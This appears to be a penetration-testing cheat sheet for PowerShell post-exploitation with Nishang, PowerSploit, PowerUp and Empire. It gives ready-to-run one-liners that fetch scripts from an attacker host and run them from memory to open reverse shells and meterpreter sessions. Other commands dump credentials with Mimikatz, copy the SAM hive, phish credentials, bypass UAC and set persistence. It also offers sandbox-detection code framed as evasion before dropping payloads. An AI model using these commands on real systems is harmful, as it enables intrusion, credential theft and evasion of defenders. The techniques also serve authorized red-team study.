In this section we review the PowerShell frameworks that help with the post-exploitation phase, after a few PowerShell basics that the frameworks build on.
Intro to PowerShell
To check the version:
$PSVersionTable.PSVersion
PowerShell v1.0: Windows XP SP2, Server 2003 SP1, Vista
PowerShell v2.0: Windows 7, Server 2008 R2
PowerShell v3.0: Windows 8, Server 2012
PowerShell v4.0: Windows 8.1, Server 2012 R2
PowerShell v5.0: Windows 10
PowerShell v5.1: Windows 10 (1607 and later), Server 2016
The version matters for the tooling below: the CIM cmdlets (Get-CimInstance) need v3.0+, and several Nishang/PowerSploit scripts do not run on the v2.0 that ships with Windows 7.
Change default colors:
$host.UI.RawUI.ForegroundColor = "black"
$host.UI.RawUI.BackgroundColor = "white"
clear
To compile a .ps1 into an .exe use the "PowerGUI Pro script editor".
- List hotfixes
Get-HotFix
Equivalent using wmic:
wmic qfe list
- Detect a sandboxed or virtualised environment (vendor strings such as VMware or VirtualBox show up in the BIOS name and serial number; these values can be edited by the sandbox owner, so treat a match as a hint, not proof)
Get-WmiObject Win32_BIOS | Format-List Name,SerialNumber
- Handling Certificates
To list installed certificates (the user's personal store, then the machine-wide stores; Cert:\LocalMachine alone lists the store names, Cert:\LocalMachine\My the machine's personal certificates):
Get-ChildItem -Path "Cert:\CurrentUser\My"
Get-ChildItem -Path "Cert:\LocalMachine"
Get-ChildItem -Path "Cert:\LocalMachine\My"
Using GUI:
certmgr.msc
To create a self-signed certificate:
$cert = New-SelfSignedCertificate -CertStoreLocation Cert:\LocalMachine\My -DnsName testcert.example.org
Writing to the LocalMachine store needs an elevated prompt; use Cert:\CurrentUser\My from a non-admin session.
- Show system uptime:
Get-CimInstance -ClassName win32_operatingsystem | select csname, lastbootuptime
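The BIOS query under "Detect sandboxed environment" is one indicator; the following function is an added example (not Nishang's Check-VM and not code from the original page) that combines several cheap WMI/CIM signals, including the boot time shown in the uptime command above. The vendor strings, uptime and hardware-size thresholds are assumptions based on commonly observed values and are easy for a sandbox owner to spoof, so the result is a heuristic. Requires PowerShell 3.0+ for Get-CimInstance.

```powershell
# Added example: heuristic VM/sandbox detection from WMI/CIM data.
# The indicator strings and thresholds below are assumptions, not a guarantee.
function Test-VirtualMachine {
    [CmdletBinding()]
    param()

    $indicators = @()

    $bios = Get-CimInstance -ClassName Win32_BIOS
    $cs   = Get-CimInstance -ClassName Win32_ComputerSystem
    $os   = Get-CimInstance -ClassName Win32_OperatingSystem

    # Vendor strings that commonly appear in virtualised hardware (assumed list).
    $vmPattern = 'VMware|VirtualBox|innotek|Virtual Machine|QEMU|KVM|Xen|Parallels|Hyper-V|Bochs'

    foreach ($pair in @(
        @{ Field = 'BIOS.Manufacturer';           Value = $bios.Manufacturer },
        @{ Field = 'BIOS.SerialNumber';           Value = $bios.SerialNumber },
        @{ Field = 'BIOS.Version';                Value = ($bios.BIOSVersion -join ' ') },
        @{ Field = 'ComputerSystem.Manufacturer'; Value = $cs.Manufacturer },
        @{ Field = 'ComputerSystem.Model';        Value = $cs.Model }
    )) {
        if ($pair.Value -match $vmPattern) {
            $indicators += "$($pair.Field) = '$($pair.Value)'"
        }
    }

    # Analysis sandboxes are usually freshly booted: a very short uptime is a weak signal.
    # Get-CimInstance already returns LastBootUpTime as a DateTime.
    $uptime = (Get-Date) - $os.LastBootUpTime
    if ($uptime.TotalMinutes -lt 10) {
        $indicators += "Uptime only $([int]$uptime.TotalMinutes) minutes"
    }

    # Small CPU/RAM allocations are typical of analysis VMs (assumed thresholds).
    if ($cs.NumberOfLogicalProcessors -lt 2) {
        $indicators += "Only $($cs.NumberOfLogicalProcessors) logical CPU"
    }
    if ($cs.TotalPhysicalMemory -lt 2GB) {
        $indicators += "Only $([int]($cs.TotalPhysicalMemory / 1MB)) MB RAM"
    }

    [PSCustomObject]@{
        LikelyVirtual = ($indicators.Count -gt 0)
        Indicators    = $indicators
    }
}

Test-VirtualMachine | Format-List
```

Run it before dropping anything noisy; a single match on uptime or RAM alone is weak, a vendor string in the BIOS or model field is the strongest of these signals.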
Some examples of PowerShell Scripts
Capturing a screenshot
The script needs an interactive desktop; from a service context or a non-interactive remote shell CopyFromScreen throws. Saving with the file name alone would write PNG data regardless of the .bmp extension, so the format is passed explicitly.
Param(
    [Parameter(Mandatory = $true)][string]$Path
)
$FileName = "$env:COMPUTERNAME - $(Get-Date -f yyyy-MM-dd_HHmmss).bmp"
$File = "$Path\$FileName"
Add-Type -AssemblyName System.Windows.Forms
Add-Type -AssemblyName System.Drawing
# VirtualScreen covers all attached monitors
$Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen
$Width  = $Screen.Width
$Height = $Screen.Height
$Left   = $Screen.Left
$Top    = $Screen.Top
$bitmap  = New-Object System.Drawing.Bitmap $Width, $Height
$graphic = [System.Drawing.Graphics]::FromImage($bitmap)
$graphic.CopyFromScreen($Left, $Top, 0, 0, $bitmap.Size)
# Explicit format: Save($File) alone picks PNG for an in-memory bitmap
$bitmap.Save($File, [System.Drawing.Imaging.ImageFormat]::Bmp)
$graphic.Dispose()
$bitmap.Dispose()
Write-Output "Screenshot saved to:"
Write-Output $File
Source: https://www.pdq.com/blog/capturing-screenshots-with-powershell-and-net/
Nishang Framework
Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing.
In Kali the scripts live under /usr/share/nishang. The examples below import a single script and call its function; the -exec bypass switch only relaxes the execution policy for this process, it is not a security bypass.
powershell.exe -exec bypass -Command "& {Import-Module 'C:\Users\User\Desktop\temp\Port-Scan.ps1'; Port-Scan -StartAddress 192.168.56.101 -EndAddress 192.168.56.105 -ResolveHost -ScanPort}"
powershell.exe -exec bypass -Command "& {Import-Module 'C:\Users\User\Desktop\temp\Remove-Update.ps1'; Remove-Update KB2534366}"
powershell.exe -exec bypass -Command "& {Import-Module 'C:\Users\User\Desktop\temp\Invoke-CredentialsPhish.ps1'; Invoke-CredentialsPhish}"
powershell.exe -exec bypass -Command "& {Import-Module 'C:\Users\User\Desktop\temp\Get-PassHashes.ps1'; Get-PassHashes}"
Fileless execution with Nishang (the script is fetched over HTTP and run from memory with IEX; $IP and $LOCALIP are placeholders for the attacker host that you replace by hand in these one-liners; if you keep them as real PowerShell variables, write ${IP}:8000 for a host:port pair, because "$IP:8000" is parsed as a single variable name). Fileless is not logless: with script block logging enabled (PowerShell 5.0 and later) the downloaded script body is recorded in event 4104.
powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://$IP/Check-VM.ps1'); Check-VM"
Does not work on Windows 7 (PowerShell 2.0):
powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://$IP/winpost/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress $IP -Port 443"
On Windows 7, download the script to disk first and import it:
powershell -ep bypass -command "(New-Object Net.WebClient).DownloadFile('http://$IP/winpost/Invoke-PowerShellTcp.ps1', 'Invoke-PowerShellTcp.ps1'); Import-Module .\Invoke-PowerShellTcp.ps1; Invoke-PowerShellTcp -IPAddress $LOCALIP -Reverse -Port 443"
Other useful modules:
- Powerpreter
- Out-CHM
- Out-Word
- Out-Excel
- Out-HTA
Powersploit Framework
powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://$IP:8000/CodeExecution/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost $LOCALIP -Lport 4444 -Force"
IEX (New-Object Net.WebClient).DownloadString("http://$IP:8000/Recon/Invoke-ReverseDnsLookup.ps1"); Invoke-ReverseDnsLookup -IpRange $IP/24
IEX (New-Object Net.WebClient).DownloadString("http://$IP:8000/Exfiltration/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -DumpCreds
IEX (New-Object Net.WebClient).DownloadString("http://$IP:8000/Exfiltration/Invoke-NinjaCopy.ps1"); Invoke-NinjaCopy -Path "C:\Windows\System32\config\SAM" -LocalDestination "C:\Users\master\Desktop\SAM"
Powersploit modules: PowerUp
PowerUp is a PowerShell tool to assist with local privilege escalation on Windows systems. It contains several methods to identify and abuse vulnerable services, as well as DLL hijacking opportunities, vulnerable registry settings, and escalation opportunities. It is part of PowerSploit and resides at https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc. Empire implements PowerUp’s escalation functionality in the privesc/powerup/* modules.
powershell.exe -nop -exec bypass
Import-Module .\PowerUp.ps1
Invoke-AllChecks | Out-File -Encoding ASCII checks.txt
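To make the checks.txt output easier to interpret, here is an added example (my own code, not PowerUp's) that re-implements two of the checks Invoke-AllChecks runs: unquoted service binary paths containing spaces (PowerUp's Get-UnquotedService) and service binaries or directories writable by the current user (PowerUp's Get-ModifiableServiceFile). It is read-only and assumes PowerShell 3.0+ for Get-CimInstance; the set of rights treated as "write-class" is my assumption.

```powershell
# Added example: two PowerUp-style service checks, implemented from scratch.
function Get-WeakServiceBinary {
    [CmdletBinding()]
    param()

    # SIDs of the current user and all its groups, for matching against ACEs.
    $me     = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $mySids = @($me.Groups | ForEach-Object { $_.Value }) + $me.User.Value
    # Rights that let us replace or append to a file / create files in a directory (assumed set).
    $writeMask = [int][System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Write, Modify, FullControl'

    # True if any Allow ACE for one of our SIDs grants a write-class right.
    function Test-Writable([string]$Path) {
        try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
            catch { continue }
            if (($mySids -contains $sid) -and (([int]$ace.FileSystemRights -band $writeMask) -ne 0)) { return $true }
        }
        return $false
    }

    # Extract the executable from PathName, which may be quoted and/or carry arguments.
    function Get-ServiceExe([string]$PathName) {
        if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
        if ($PathName -match '^(.+?\.exe)') { return $Matches[1] }   # -match is case-insensitive
        return ($PathName -split ' ')[0]
    }

    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        if (-not $svc.PathName) { continue }
        $exe = Get-ServiceExe $svc.PathName

        # Check 1: unquoted path with spaces. The SCM tries C:\Program.exe,
        # C:\Program Files\My.exe, ... before the real binary, so a writable
        # prefix directory lets a local user plant a binary that runs as the service.
        if ($svc.PathName -notmatch '^"' -and $exe -match ' ') {
            $parts = $exe -split ' '
            for ($i = 1; $i -lt $parts.Count; $i++) {
                $candidate = ($parts[0..($i - 1)] -join ' ') + '.exe'
                $dir = Split-Path -Parent $candidate
                if ($dir -and (Test-Writable $dir)) {
                    [PSCustomObject]@{ Service = $svc.Name; Issue = 'UnquotedServicePath'
                                       Target = $candidate; RunsAs = $svc.StartName }
                }
            }
        }

        # Check 2: the binary itself, or the directory it lives in, is writable by us.
        if (Test-Path -LiteralPath $exe) {
            if (Test-Writable $exe) {
                [PSCustomObject]@{ Service = $svc.Name; Issue = 'WritableServiceBinary'
                                   Target = $exe; RunsAs = $svc.StartName }
            } elseif (Test-Writable (Split-Path -Parent $exe)) {
                [PSCustomObject]@{ Service = $svc.Name; Issue = 'WritableServiceDirectory'
                                   Target = (Split-Path -Parent $exe); RunsAs = $svc.StartName }
            }
        }
    }
}

Get-WeakServiceBinary | Format-Table -AutoSize
```

A finding is only useful if the service runs as a privileged account (RunsAs is LocalSystem or an admin) and you can restart it or it restarts on boot; PowerUp's Get-ModifiableService covers the separate case where the service configuration itself, rather than its binary, is writable.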
Powersploit modules: BypassUAC
Bypass-UAC.ps1 with the -Method names used below is FuzzySecurity's PowerShell-Suite script (https://github.com/FuzzySecurity/PowerShell-Suite), not a PowerSploit module; it only helps when the current user is already a member of Administrators running at medium integrity, since UAC bypass does not grant admin rights to a standard user.
Import-Module .\Bypass-UAC.ps1
Does not work on Windows Server 2012:
Bypass-UAC -Method UacMethodSysprep
Works on Windows Server 2012:
Bypass-UAC -Method ucmDismMethod
Bypass-UAC -Method UacMethodMMC2
Powersploit modules: Trojanize DLL
See also Msfvenom Payloads Cheat Sheet.
Powersploit modules: Trojanize Windows Service
Write-ServiceBinary [-Name] <String> [-UserName <String>] [-Password <String>] [-LocalGroup <String>] [-Credential <PSCredential>] [-Command <String>] [-Path <String>]
Source: https://powersploit.readthedocs.io/en/latest/Privesc/Write-ServiceBinary/
Empire Framework
Empire is a PowerShell and Python post-exploitation agent with a listener/stager/agent model: a listener receives callbacks, a launcher (stager) is run on the target, and the resulting agent is tasked with modules.
Installation:
git clone https://github.com/EmpireProject/Empire.git
cd Empire/
./setup/install.sh
Usage:
./empire
(Empire) > listeners
(Empire: listeners) > uselistener http
(Empire: listeners/http) > execute
(Empire: listeners/http) > launcher powershell
powershell -noP -sta -w 1 -enc SQBmACgAJA<REDACTED>QB8AEkARQBYAA==
(Empire: listeners/http) >
Run the generated PowerShell launcher on the Windows target to open an agent session in Empire (the blob is truncated here; a real one is several kilobytes):
powershell -noP -sta -w 1 -enc SQBmACgAJAQB8AEkARQBYAA==
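The -enc argument is nothing more than the launcher script encoded as UTF-16LE and then base64; the visible prefix SQBmACgAJA decodes to "If($", the start of Empire's PowerShell-version check. The two helpers below are an added example (not Empire's code) for decoding a launcher so you can read it before running it, and for building one from your own script; the round trip uses a harmless constructed command.

```powershell
# Added example: decode / encode the payload format used by powershell -EncodedCommand.
function ConvertFrom-EncodedCommand {
    param([Parameter(Mandatory = $true)][string]$Encoded)
    # -enc payloads are UTF-16LE text, base64-encoded
    [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($Encoded))
}

function ConvertTo-EncodedCommand {
    param([Parameter(Mandatory = $true)][string]$Script)
    [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($Script))
}

# Round trip on a constructed, harmless command (not an Empire stager):
$enc = ConvertTo-EncodedCommand 'Get-Date'
$enc                                    # RwBlAHQALQBEAGEAdABlAA==
ConvertFrom-EncodedCommand $enc         # Get-Date

# Same flags Empire's launcher uses: no profile, single-threaded apartment, hidden window
powershell -NoProfile -sta -w 1 -EncodedCommand $enc
```

Paste a captured launcher's blob into ConvertFrom-EncodedCommand to see the listener URL, user agent and key material it carries; the decoded text is also what script block logging (event 4104) records on the target, so the encoding hides nothing from a host with logging enabled.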
To handle agents in Empire:
agents
interact $AGENTID
rename [old name] [new name]
Advanced modules:
From the agent menu, bypassuac http is a shortcut for the privesc/bypassuac module pointed at the http listener; the explicit form is:
usemodule privesc/bypassuac
set Listener http
run
or disk-less:
usemodule privesc/bypassuac_wscript
For credentials gathering:
mimikatz (from the agent menu; runs powershell/credentials/mimikatz/logonpasswords on the agent, and the harvested credentials are kept in Empire's credential store, shown with creds)
Persistence:
usemodule persistence/elevated/schtasks
References:
- https://github.com/EmpireProject/Empire
- https://github.com/EmpireProject/Empire/wiki/Quickstart
- Automating Empire with DeathStar: https://byt3bl33d3r.github.io/automating-the-empire-with-the-death-star-getting-domain-admin-with-a-push-of-a-button.html
WinEnum
A PowerShell privilege escalation enumeration script.